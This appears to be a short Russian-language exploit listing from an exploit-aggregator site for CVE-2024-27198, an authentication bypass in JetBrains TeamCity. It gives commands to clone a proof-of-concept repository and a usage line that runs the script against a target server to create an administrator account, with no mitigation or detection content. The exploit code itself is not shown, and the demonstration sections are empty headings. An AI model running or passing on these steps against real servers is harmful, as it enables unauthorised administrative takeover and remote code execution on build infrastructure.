## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JRBH4CK-CVE-2024-27198
# CVE-2024-27198
В JetBrains TeamCity до версии 2023.11.4 обход аутентификации позволяет выполнять административные действия на сервере TeamCity. Злоумышленник может получить полный контроль над всеми проектами, сборками, агентами и артефактами TeamCity и в итоге выполнить RCE.
## Загрузка
root@kitploit:~
git clone https://github.com/jrbH4CK/CVE-2024-27198.git
cd CVE-2024-27198
## PoC
Для создания учётной записи с правами администратора на сервере:
root@kitploit:~
python3 cve-2024-27198.py http://example.com username password
### Демонстрация:
#### Создание учётной записи

#### Роли пользователей

## Дополнительные примечания